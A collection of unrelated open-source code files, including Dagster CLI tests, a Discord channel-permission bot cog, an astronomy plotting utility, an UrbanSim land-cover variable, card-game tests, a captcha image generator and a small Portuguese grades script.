with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env={},
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'not_a_repo_or_pipeline',
},
)
assert str(exc_info.value) == (
'not_a_repo_or_pipeline must be a function that returns a '
'PipelineDefinition or a RepositoryDefinition, or a function '
'decorated with @pipeline.'
)
def test_fn_returns_wrong_thing():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env={},
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'not_a_repo_or_pipeline_fn',
},
)
assert str(exc_info.value) == (
'not_a_repo_or_pipeline_fn is a function but must return a '
'PipelineDefinition or a RepositoryDefinition, or be decorated '
'with @pipeline.'
)
def runner_pipeline_execute(runner, cli_args):
result = runner.invoke(pipeline_execute_command, cli_args)
if result.exit_code != 0:
# CliRunner captures stdout so printing it out here
raise Exception(
(
'dagster pipeline execute commands with cli_args {cli_args} '
'returned exit_code {exit_code} with stdout:\n"{stdout}" and '
'\nresult as string: "{result}"'
).format(
cli_args=cli_args, exit_code=result.exit_code, stdout=result.stdout, result=result
)
)
return result
def test_scaffold_command():
for cli_args in valid_execute_args():
cli_args['print_only_required'] = True
execute_scaffold_command(cli_args=cli_args, print_fn=no_print)
cli_args['print_only_required'] = False
execute_scaffold_command(cli_args=cli_args, print_fn=no_print)
runner = CliRunner()
for cli_args in valid_cli_args():
result = runner.invoke(pipeline_scaffold_command, cli_args)
assert result.exit_code == 0
result = runner.invoke(pipeline_scaffold_command, ['-p'] + cli_args)
assert result.exit_code == 0
def test_default_memory_run_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(env=None, cli_args=cli_args)
assert result.success
def test_override_with_in_memory_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(
env=[script_relative_path('in_memory_env.yaml')], cli_args=cli_args
)
assert result.success
def test_override_with_filesystem_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(
env=[script_relative_path('filesystem_env.yaml')], cli_args=cli_args
)
assert result.success
def test_run_list():
runner = CliRunner()
result = runner.invoke(run_list_command)
assert result.exit_code == 0
def test_run_wipe_correct_delete_message():
runner = CliRunner()
result = runner.invoke(run_wipe_command, input="DELETE\n")
assert 'Deleted all run history and event logs' in result.output
assert result.exit_code == 0
def test_run_wipe_incorrect_delete_message():
runner = CliRunner()
result = runner.invoke(run_wipe_command, input="WRONG\n")
assert 'Exiting without deleting all run history and event logs' in result.output
assert result.exit_code == 0
@schedules(scheduler=FilesytemTestScheduler)
def define_bar_scheduler():
return [
ScheduleDefinition(
"foo_schedule",
cron_schedule="* * * * *",
pipeline_name="test_pipeline",
environment_dict={},
)
]
def test_schedules_list_without_dagster_home():
runner = CliRunner()
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 2
assert 'Error: $DAGSTER_HOME is not set' in result.output
def test_schedules_list():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert result.output == ('Repository bar\n' '**************\n')
def test_schedules_up():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert result.output == 'Changes:\n + foo_schedule (add)\n'
def test_schedules_up_and_list():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert (
result.output == 'Repository bar\n'
'**************\n'
'Schedule: foo_schedule [STOPPED]\n'
'Cron Schedule: * * * * *\n'
)
def test_schedules_start_and_stop():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Started schedule foo_schedule with ' in result.output
result = runner.invoke(
schedule_stop_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Stopped schedule foo_schedule with ' in result.output
def test_schedules_start_all():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), '--start-all'],
)
assert result.exit_code == 0
assert result.output == 'Started all schedules for repository bar\n'
def test_schedules_wipe_correct_delete_message():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_wipe_command,
['-y', script_relative_path('repository_file.yaml')],
input="DELETE\n",
)
assert result.exit_code == 0
assert 'Wiped all schedules and schedule cron jobs' in result.output
result = runner.invoke(
schedule_up_command,
['-y', script_relative_path('repository_file.yaml'), '--preview'],
)
# Verify schedules were wiped
assert result.exit_code == 0
assert result.output == 'Planned Changes:\n + foo_schedule (add)\n'
def test_schedules_wipe_incorrect_delete_message():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_wipe_command,
['-y', script_relative_path('repository_file.yaml')],
input="WRONG\n",
)
assert result.exit_code == 0
assert 'Exiting without deleting all schedules and schedule cron jobs' in result.output
result = runner.invoke(
schedule_up_command,
['-y', script_relative_path('repository_file.yaml'), '--preview'],
)
# Verify schedules were not wiped
assert result.exit_code == 0
assert (
result.output
== 'No planned changes to schedules.\n1 schedules will remain unchanged\n'
)
def test_schedules_restart():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
result = runner.invoke(
schedule_restart_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Restarted schedule foo_schedule' in result.output
def test_schedules_restart_all():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
result = runner.invoke(
schedule_restart_command,
[
'-y',
script_relative_path('repository_file.yaml'),
'foo_schedule',
'--restart-all-running',
],
)
assert result.exit_code == 0
assert result.output == 'Restarted all running schedules for repository bar\n'
def test_multiproc():
with seven.TemporaryDirectory() as temp:
runner = CliRunner(env={'DAGSTER_HOME': temp})
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'multiproc',
'multi_mode_with_resources', # pipeline name
],
)
assert 'PIPELINE_SUCCESS' in add_result.output
def test_multiproc_invalid():
# force ephemeral instance by removing out DAGSTER_HOME
runner = CliRunner(env={'DAGSTER_HOME': None})
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'multiproc',
'multi_mode_with_resources', # pipeline name
],
)
# which is invalid for multiproc
assert 'DagsterUnmetExecutorRequirementsError' in add_result.output
class InMemoryRunLauncher(RunLauncher, ConfigurableClass):
def __init__(self, inst_data=None):
self._inst_data = inst_data
self._queue = []
def launch_run(self, _instance, run):
self._queue.append(run)
return run
def queue(self):
return self._queue
@classmethod
def config_type(cls):
return Shape({})
@classmethod
def from_config_value(cls, inst_data, config_value):
return cls(inst_data=inst_data,)
@property
def inst_data(self):
return self._inst_data
@repository_partitions
def define_baz_partitions():
return [
PartitionSetDefinition(
name='baz_partitions', pipeline_name='baz', partition_fn=lambda: string.ascii_lowercase,
)
]
def backfill_execute_args(execution_args):
backfill_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'noprompt': True,
}
pipeline_name = execution_args.get('pipeline_name')
if pipeline_name:
backfill_args['pipeline_name'] = (pipeline_name,)
for name, value in execution_args.items():
if name != 'pipeline_name':
backfill_args[name] = value
return backfill_args
def backfill_cli_runner_args(execution_args):
backfill_args = ['-y', script_relative_path('repository_file.yaml'), '--noprompt']
pipeline_name = execution_args.get('pipeline_name')
if pipeline_name:
backfill_args.append(pipeline_name)
for name, value in execution_args.items():
if name != 'pipeline_name':
backfill_args.extend(['--{}'.format(name.replace('_', '-')), value])
return backfill_args
def run_test_backfill(
execution_args, expected_count=None, error_message=None, use_run_launcher=True
):
runner = CliRunner()
run_launcher = InMemoryRunLauncher() if use_run_launcher else None
with seven.TemporaryDirectory() as temp_dir:
instance = DagsterInstance(
instance_type=InstanceType.EPHEMERAL,
local_artifact_storage=LocalArtifactStorage(temp_dir),
run_storage=InMemoryRunStorage(),
event_storage=InMemoryEventLogStorage(),
compute_log_manager=NoOpComputeLogManager(temp_dir),
run_launcher=run_launcher,
)
with mock.patch('dagster.core.instance.DagsterInstance.get') as _instance:
_instance.return_value = instance
if error_message:
with pytest.raises(UsageError) as error_info:
execute_backfill_command(backfill_execute_args(execution_args), no_print)
assert error_info and error_message in error_info.value.message
result = runner.invoke(
pipeline_backfill_command, backfill_cli_runner_args(execution_args)
)
if error_message:
assert result.exit_code == 2
else:
assert result.exit_code == 0
if expected_count:
assert len(run_launcher.queue()) == expected_count
def test_backfill_no_run_launcher():
args = {'pipeline_name': 'baz'} # legit partition args
run_test_backfill(
args, use_run_launcher=False, error_message='A run launcher must be configured'
)
def test_backfill_no_pipeline():
args = {'pipeline_name': 'nonexistent'}
run_test_backfill(args, error_message='No pipeline found')
def test_backfill_no_partition_sets():
args = {'pipeline_name': 'foo'}
run_test_backfill(args, error_message='No partition sets found')
def test_backfill_no_named_partition_set():
args = {'pipeline_name': 'baz', 'partition_set': 'nonexistent'}
run_test_backfill(args, error_message='No partition set found')
def test_backfill_launch():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions'}
run_test_backfill(args, expected_count=len(string.ascii_lowercase))
def test_backfill_partition_range():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'from': 'x'}
run_test_backfill(args, expected_count=3)
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'to': 'c'}
run_test_backfill(args, expected_count=3)
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'from': 'c', 'to': 'f'}
run_test_backfill(args, expected_count=4)
def test_backfill_partition_enum():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'partitions': 'c,x,z'}
run_test_backfill(args, expected_count=3)
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster_tests/cli_tests/test_cli_commands.py | test_cli_commands.py | py | 31,036 | python | en | code | 2 | github-code | 36 |
14029268104 | import typing
import discord
from discord.ext import commands
from .general import is_staff, free_category, free_category_create
class FreeCategory(commands.Cog):
__slots__ = ('client', 'name', 'staff',)
permissions_jp = {
# 'create_instant_invite': '招待を作成',
'manage_channels': 'チャンネルの管理',
'manage_roles': '権限の管理',
}
permissions_jp_text = {
'read_messages': 'メッセージを読む',
'send_messages': 'メッセージを送信',
'manage_messages': 'メッセージの管理',
'embed_links': '埋め込みリンク',
'attach_files': 'ファイルを添付',
'read_message_history': 'メッセージ履歴を読む',
'external_emojis': '外部の絵文字の使用',
'add_reactions': 'リアクションの追加',
}
permissions_jp_voice = {
'read_messages': 'チャンネルを見る',
'connect': '接続',
'speak': '発言',
'mute_members': 'メンバーをミュート',
'deafen_members': 'メンバーのスピーカーをミュート',
'move_members': 'メンバーを移動',
'use_voice_activation': '音声検出を使用',
'priority_speaker': 'プライオリティスピーカー'
}
def __init__(self, client, name=None,):
self.client: commands.Bot = client
self.name = name if name is not None else type(self).__name__
@property
def category(self):
return self.client.get_channel(free_category)
@property
def create_channel(self):
return self.client.get_channel(free_category_create)
@commands.command(name='ftcc')
async def free_text_channel_create(self, ctx, *, name):
channel = await self._free_channel_create(ctx, name)
if channel is not None:
await ctx.send(
'作成しました。\n{0}\nあと{1}チャンネル作成可能。'
.format(channel.mention, 50 - len(channel.category.channels))
)
async def _free_channel_create(self, ctx, name):
category = self.category
if len(category.channels) >= 50:
await ctx.send(
"チャンネルが一杯で作成できません。\n"
"運営に連絡してください。"
)
return
guild = category.guild
overwrites = {
self.client.user:
discord.PermissionOverwrite.from_pair(discord.Permissions.all(), discord.Permissions.none()),
ctx.author:
discord.PermissionOverwrite.from_pair(discord.Permissions(66448721), discord.Permissions.none()),
guild.default_role:
discord.PermissionOverwrite.from_pair(discord.Permissions.none(), discord.Permissions.all()),
guild.get_role(515467411898761216):
discord.PermissionOverwrite.from_pair(discord.Permissions.none(), discord.Permissions.all()),
guild.get_role(515467425429585941):
discord.PermissionOverwrite.from_pair(
discord.Permissions(37080128), discord.Permissions(2 ** 53 - 37080129)),
}
return await guild.create_text_channel(name, overwrites=overwrites, category=category)
@commands.command()
async def cedit(self, ctx,
channel: typing.Union[discord.TextChannel, discord.VoiceChannel] = None):
EMOJI = 0x1f1e6 # 絵文字定数(これを足したり引いたりするとリアクション的にうまくいく)
EMBED_TITLE = 'チャンネル権限編集'
if channel is None:
channel = ctx.channel
if (
(
ctx.author in channel.overwrites
and channel.overwrites_for(ctx.author).manage_roles is not False
) # メンバーの追加設定があり、かつ「権限の管理」がNone
or await self.client.is_owner(ctx.author) # オーナー
or await is_staff(ctx.author) # スタッフチーム
):
all_commands = (
'新規に役職を追加設定',
'新規にユーザーを追加設定',
'現在設定されている追加設定の変更',
'現在設定されている追加設定の削除'
)
emojis = [chr(i + EMOJI) for i in range(len(all_commands))]
embed = discord.Embed(
title=EMBED_TITLE,
description='\n'.join(
'{0}:{1}'.format(i, e)
for i, e in zip(emojis, all_commands)
)
)
embed.set_footer(text='対象チャンネル:{0.name}\nチャンネルID:{0.id}'.format(channel))
message = await ctx.send(embed=embed)
[await message.add_reaction(e)
for e in emojis]
def check(r, u):
return (
r.me and ctx.author == u
and r.message.id == message.id
and r.message.channel == message.channel
)
reaction, _ = \
await self.client.wait_for('reaction_add', check=check)
await message.delete()
num_command = ord(reaction.emoji) - EMOJI
if 0 <= num_command <= 1:
# ユーザーまたは役職の追加
if num_command == 0:
target_type = '役職'
else:
target_type = 'ユーザー'
description1 = ('チャンネルの追加設定に{0}を追加します。\n'
'追加したい{0}を入力してください').format(target_type)
message = await ctx.send(description1)
def check1(m):
return (
m.channel == ctx.channel
and m.author == ctx.author
)
message2 = await self.client.wait_for('message', check=check1)
await message.delete()
if num_command == 0:
converter = commands.RoleConverter()
else:
converter = commands.MemberConverter()
try:
target = await converter.convert(ctx, message2.content)
except commands.BadArgument:
await ctx.send(
'指定した{0}が見つかりませんでした'.format(target_type)
+ 'もう一度やり直して下さい。'
)
return
elif 2 <= num_command <= 3:
action = '変更' if num_command == 2 else '削除'
description1 = (
'追加設定を{0}します\n'
'{0}したい役職、またはユーザーを選んでください'
).format(action)
embed = discord.Embed(title=EMBED_TITLE, description=description1)
overwrites = channel.overwrites
def func2(_page=0):
end = (_page + 1) * 17
if len(overwrites) < end:
end = len(overwrites)
start = _page * 17
tg = [i for i in overwrites.keys()][start:end]
try:
tg.remove(self.client.user)
except ValueError:
pass
desc = '\n'.join(
'{0}:{1}'.format(chr(i + EMOJI), t.mention)
for i, t in enumerate(tg)
)
return tg, desc
page = 0
targets, description1 = func2(page)
embed.add_field(name='役職・ユーザー一覧', value=description1)
message = await ctx.send(embed=embed)
[await message.add_reaction(chr(i + EMOJI))
for i in range(len(targets))]
await message.add_reaction('\U0001f519')
await message.add_reaction('\U0001f51c')
await message.add_reaction('\u274c')
def check3(r, u):
return (
u == ctx.author
and r.me
and r.message.channel == message.channel
and r.message.id == message.id
)
while True:
new_page = page
reaction, user = \
await self.client.wait_for('reaction_add', check=check3)
await message.remove_reaction(reaction, user)
if reaction.emoji == '\U0001f519':
new_page = page - 1
elif reaction.emoji == '\U0001f51c':
new_page = page + 1
elif reaction.emoji == '\u274c':
await message.delete()
await ctx.send('中止しました。')
return
else:
break
if new_page != page:
new_targets, description1 = func2(_page=new_page)
if description1 != '':
embed.set_field_at(
0, name='役職・ユーザー一覧', value=description1
)
await message.edit(embed=embed)
page = new_page
targets = new_targets
await message.delete()
target = targets[ord(reaction.emoji) - EMOJI]
if num_command <= 2:
perms_jp = self.permissions_jp.copy()
perms_jp.update(
self.permissions_jp_text
if isinstance(channel, discord.TextChannel)
else self.permissions_jp_voice
)
perms = tuple(perms_jp.keys())
def func1(overwrite):
description = ''
n = 0
for en, jp in perms_jp.items():
try:
value = getattr(overwrite, en)
except AttributeError:
continue
else:
description += '{0}'.format(chr(n + EMOJI))
description += jp
if value:
description += ':\u2705\n'
elif value is None:
description += ':\u2b1c\n'
else:
description += ':\u274c\n'
n += 1
return description
overwrite1: discord.PermissionOverwrite = channel.overwrites_for(target)
embed = discord.Embed(
title=EMBED_TITLE,
description='{0}の権限設定を変更します'.format(target.mention)
)
embed.add_field(name='権限一覧', value=func1(overwrite1))
message3 = await ctx.send(embed=embed)
[await message3.add_reaction(chr(i + EMOJI))
for i in range(len(perms))]
await message3.add_reaction('\u2705')
await message3.add_reaction('\u274c')
def check2(reaction, user):
return (
user == ctx.author
and reaction.me
and reaction.message.channel == message3.channel
and reaction.message.id == message3.id
)
loop = True
while loop:
reaction, user = await self.client.wait_for('reaction_add', check=check2)
if reaction.emoji == '\u2705':
loop = False
continue
elif reaction.emoji == '\u274c':
await message3.delete()
await ctx.send('中止しました。')
break
await message3.remove_reaction(reaction, user)
perm = perms[ord(reaction.emoji) - EMOJI]
value = getattr(overwrite1, perm)
if value:
value = False
elif value is None:
value = True
else:
value = None
if perm == 'manage_roles' and value:
value = False
overwrite1.update(**{perm: value})
embed.set_field_at(0, name='権限一覧', value=func1(overwrite1))
await message3.edit(embed=embed)
else:
await message3.delete()
await channel.set_permissions(target, overwrite=overwrite1)
await ctx.send('権限を変更しました。')
elif num_command == 3:
await channel.set_permissions(target, overwrite=None)
await ctx.send('権限を削除しました。')
else:
await ctx.send('あなたはそれをする権限がありません。')
| Kesigomon/Skyline_py | cogs/freecategory.py | freecategory.py | py | 13,622 | python | en | code | 7 | github-code | 36 |
5032205330 | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import getdist
#from getdist import plots, MCSamples
sys.path.append(
"{}/utils".format(os.environ["GitHub"])
)
import list_utils as list_utils
import directory_utils as directory_utils
# NOTE: A LOT NEED TO CHANGE HERE ...
# TODO: The samples in the 2dmarginal plot need not be in a grid.
def get_list_of_directory_trees_in_directory(directory):
return [
x[0]
for x in os.walk(directory)
]
def get_subphase_directory(x_i, x_j, y_i, y_j):
str_0 = "galaxies_subhalo_mass_centre_0_" + "{0:.2f}".format(x_i) + "_" + "{0:.2f}".format(x_j)
str_1 = "galaxies_subhalo_mass_centre_1_" + "{0:.2f}".format(y_i) + "_" + "{0:.2f}".format(y_j)
return "{}_{}".format(
str_0,
str_1
)
def get_subphase_directories_for_gridsearch(phase_directory, xmin, xmax, ymin, ymax, number_of_steps):
x = np.linspace(xmin, xmax, number_of_steps + 1)
y = np.linspace(ymin, ymax, number_of_steps + 1)
directories = []
for i in range(number_of_steps):
directories_temp = []
for j in range(number_of_steps):
subphase_directory = get_subphase_directory(
x_i=x[i], x_j=x[i+1], y_i=y[j], y_j=y[j+1]
)
# TODO: sanitize the phase directory
phase_directory = directory_utils.sanitize_directory(
directory=phase_directory
)
subphase_directory = phase_directory + "/" + subphase_directory
if not os.path.isdir(subphase_directory):
raise IOError(subphase_directory + " does not exist")
list_of_directory_trees_filtered = list_utils.filter_input_list_of_strings_after_split_with_ending_string(
input_list_of_strings=get_list_of_directory_trees_in_directory(
directory=subphase_directory
),
split_character="/",
ending_string="optimizer_backup"
)
if len(list_of_directory_trees_filtered) == 1:
if not os.listdir(list_of_directory_trees_filtered[0]):
directories_temp.append(None)
else:
directories_temp.append(list_of_directory_trees_filtered[0])
if len(list_of_directory_trees_filtered) < 1:
directories_temp.append(None)
#raise ValueError("optimizer_backup does not exist")
if len(list_of_directory_trees_filtered) > 1:
raise ValueError("THIS IS WEIRD...")
directories.append(directories_temp)
return directories
def get_samples_from_subphase_directories(directories):
samples = []
for i in range(np.shape(directories)[0]):
samples_temp = []
for j in range(np.shape(directories)[1]):
if directories[i][j] is not None:
directory = directories[i][j] + "/multinest"
try:
sample = getdist.mcsamples.loadMCSamples(directory)
#print(sample.__dict__)
except:
sample = None
else:
sample = None
samples_temp.append(sample)
samples.append(samples_temp)
return samples
def subhalo_grid_plot_from_samples(samples, levels=None):
plt.figure(
figsize=(15, 15)
)
# ...
if levels is None:
levels = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
# ...
for i in range(np.shape(samples)[0]):
for j in range(np.shape(samples)[0]):
sample_temp = samples[i][j]
if sample_temp is not None:
density2D = sample_temp.get2DDensity(
'galaxies_subhalo_mass_centre_1',
'galaxies_subhalo_mass_centre_0'
)
if density2D is not None:
plt.contour(
density2D.x,
density2D.y,
density2D.P,
levels=levels,
colors="black"
)
#print("OK")
for i in np.linspace(-2.0, 2.0, 5):
plt.axvline(i, linestyle="--", linewidth=2, color="r")
plt.axhline(i, linestyle="--", linewidth=2, color="r")
plt.plot([-1.0], [0.0], marker="*", markersize=20, color="b")
plt.xlabel("x (arcsec)", fontsize=20)
plt.ylabel("y (arcsec)", fontsize=20)
plt.xlim((-2.1, 2.1))
plt.ylim((-2.1, 2.1))
plt.show()
if __name__ == "__main__":
phase_directory = "/Users/ccbh87/Desktop/COSMA/cosma7/data/dp004/dc-amvr1/workspace/output/interferometer/lens_powerlaw_and_shear_and_subhalo__source_ellipticalcoresersic/model_1/total_flux_1.0_Jy/5.6/230GHz/t_tot__60s/t_int__10s/n_channels_128/0.5mm/width_128/pipeline__lens_fixed_with_subhalo__source_inversion/general/source__pix_voro_mag__reg_const__with_shear/phase_2__subhalo_search__source/phase_tag__rs_shape_125x125__rs_pix_0.04x0.04__sub_2__pos_0.20/"
xmin = -2.0
xmax = 2.0
ymin = -2.0
ymax = 2.0
number_of_steps = 4
subphase_directories = get_subphase_directories_for_gridsearch(
phase_directory=phase_directory,
xmin=xmin,
xmax=xmax,
ymin=ymin,
ymax=ymax,
number_of_steps=number_of_steps
)
samples = get_samples_from_subphase_directories(directories=subphase_directories)
subhalo_grid_plot_from_samples(samples=samples)
| Sketos/utils | autolens_utils/autolens_directory_utils.py | autolens_directory_utils.py | py | 5,540 | python | en | code | 0 | github-code | 36 |
28508588527 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from numpy import float32, arcsin, sqrt
from numpy import ma
from opus_core.variables.variable import Variable
from biocomplexity.land_cover.variable_functions import my_attribute_label
class pwa(Variable):
"""Percent water within footprint.
- need {"constants":{"FOOTPRINT":footprint,"OW":12}} in resources
when compute, where footprint=ones(shape=(5,5), dtype="int32")."""
land_cover_type_ow_within_footprint = 'land_cover_type_ow_within_footprint' # ow->open_water
footprint_size = 'footprint_size'
def dependencies(self):
return [my_attribute_label(self.land_cover_type_ow_within_footprint),
my_attribute_label(self.footprint_size)]
def compute(self, dataset_pool):
den = self.get_dataset().get_attribute(self.footprint_size).astype(float32)
pct = self.get_dataset().get_attribute(self.land_cover_type_ow_within_footprint)
return ma.filled(arcsin(sqrt(pct/den)), 0)
from numpy import array
from opus_core.tests import opus_unittest
from opus_core.datasets.dataset_pool import DatasetPool
from opus_core.storage_factory import StorageFactory
from biocomplexity.tests.expected_data_test import ExpectedDataTest
class Tests(ExpectedDataTest):
variable_name = "biocomplexity.land_cover.pwa"
def test_my_inputs(self):
storage = StorageFactory().get_storage('dict_storage')
storage.write_table(
table_name='land_covers',
table_data={
'relative_x': array([1,2,1,2]),
'relative_y': array([1,1,2,2]),
"land_cover_type_ow_within_footprint": array([3, 2, 1, 0]),
"footprint_size": array([5, 4, 5, 5])
}
)
dataset_pool = DatasetPool(package_order=['biocomplexity'],
storage=storage)
footprint = array([[0,1,0], [1,1,1], [0,1,0]])
dataset_pool._add_dataset(
'constant',
{
"FOOTPRINT": footprint,
}
)
gridcell = dataset_pool.get_dataset('land_cover')
gridcell.compute_variables(self.variable_name,
dataset_pool=dataset_pool)
values = gridcell.get_attribute(self.variable_name)
should_be = array([3, 2, 1, 0], dtype=float32) / array([5, 4, 5, 5], dtype=float32)
should_be = arcsin(sqrt(should_be))
self.assert_(ma.allclose( values, should_be, rtol=1e-7),
msg = "Error in " + self.variable_name)
def test_on_expected_data(self):
from numpy import ones
footprint = ones(shape=(5,5), dtype="int32")
self.do_test_on_expected_data(["lct","relative_x","relative_y"],
{"constants":{"FOOTPRINT":footprint,"OW":12}},
element_atol=0.07)
if __name__=='__main__':
opus_unittest.main() | psrc/urbansim | biocomplexity/land_cover/pwa.py | pwa.py | py | 3,171 | python | en | code | 4 | github-code | 36 |
11837397080 | '''test_board.py - unit tests for board.py'''
# pylint: disable=E0401, W0621
from src.py import board
from src.py.player import Player
from src.py.card import Card
def test_get_player_name(monkeypatch):
'''test get_player_name with mock inputs'''
# Given
inputs = iter(['Bryan', 'y'])
monkeypatch.setattr('builtins.input', lambda _: next(inputs))
# When
name = board.get_player_name()
# Then
assert name == 'Bryan'
def test_pick_player(monkeypatch):
'''test pick_player() with mock input'''
# Given
players = [Player('Hanna'), Player('Richard', bot=False), Player('Kate', bot=False)]
monkeypatch.setattr('builtins.input', lambda _: 'Hanna')
# When
human_picked_player = board.pick_player(players[2], players)
bot_picked_player = board.pick_player(players[0], players)
# Then
assert human_picked_player.name() == 'Hanna'
assert human_picked_player.bot()
assert bot_picked_player.name() in ['Richard', 'Kate']
assert not bot_picked_player.bot()
def test_pick_card_with_bot():
'''test pick_card with bot arg'''
# Given
bot = Player('TEST BOT', True)
bot.d_hand = [ Card('♠','A'), Card('♠','A'), Card('♠','A') ]
# When
picked_card = board.pick_card(bot)
# Then
assert picked_card.face() == 'A'
assert picked_card.suit() == '♠'
assert picked_card.space() == ' '
def test_pick_card_with_human(monkeypatch):
'''test pick_card with human player & mock inputs'''
# Given
human = Player('TEST HUMAN', False)
human.d_hand = [ Card('♡','Q'), Card('♡','K'), Card('♡','A') ]
monkeypatch.setattr('builtins.input', lambda _: 'Q') # Mock user input
# When
picked_card = board.pick_card(human)
# Then
assert picked_card.face() == 'Q'
assert picked_card.suit() == '♡'
assert picked_card.space() == ' '
| dariustb/GoFish | tests/unit_tests/test_board.py | test_board.py | py | 1,883 | python | en | code | 0 | github-code | 36 |
74978102183 | import os
import random
from captcha import image
import numpy as np
import PIL.Image as PILImage
import cv2
import shutil
def create_train_dataset(output_dir: str, width: float, height: float, captcha_count=4, count=2000):
if not os.path.exists(output_dir):
os.mkdir(output_dir)
number_sets = lambda offset: str(offset)
lowcase_char_sets = lambda offset: chr(97 + offset)
upcase_char_sets = lambda offset: chr(65 + offset)
avaliable_sets = []
for i in range(0, 10):
avaliable_sets.append(number_sets(i))
# for i in range(0, 26):
# avaliable_sets.append(lowcase_char_sets(i))
# for i in range(0, 26):
# avaliable_sets.append(upcase_char_sets(i))
def random_str(count):
str = ""
for i in range(0, count):
rand_index = random.randrange(0, len(avaliable_sets) - 1)
str = str + avaliable_sets[rand_index]
return str
image_captcha = image.ImageCaptcha(width=width, height=height)
for i in range(count):
captcha_str = random_str(captcha_count)
image_captcha.write(captcha_str, output_dir + "/" + captcha_str + ".png", "png")
print("Gen captcha: {0}".format(captcha_str))
def remove_dataset(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
def read_dataset(dir):
images = []
labels = []
for subpath in os.listdir(dir):
if subpath.endswith(".png"):
image = np.array(PILImage.open(os.path.join(dir, subpath)))
label = subpath[:-4]
gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
images.append(gray_img / 255.0)
labels.append(label)
return images, labels
| SquarePants1991/LearnTensorFlow | 验证码识别/dataset_util.py | dataset_util.py | py | 1,701 | python | en | code | 0 | github-code | 36 |
23297961850 | #Criando a tupla
notas = {}
#Perguntando os dados aos usuários
i=1
while i <= 5:
aluno = input(str("Insira o nome do aluno: "))
nota = input("Insira a nota de {} no formato X.X: ".format(aluno))
notas[aluno] = nota
i= i + 1
#Dicionário com os alunos e as respectivas notas
print(notas)
#Resposta
maiornota = max(notas.values())
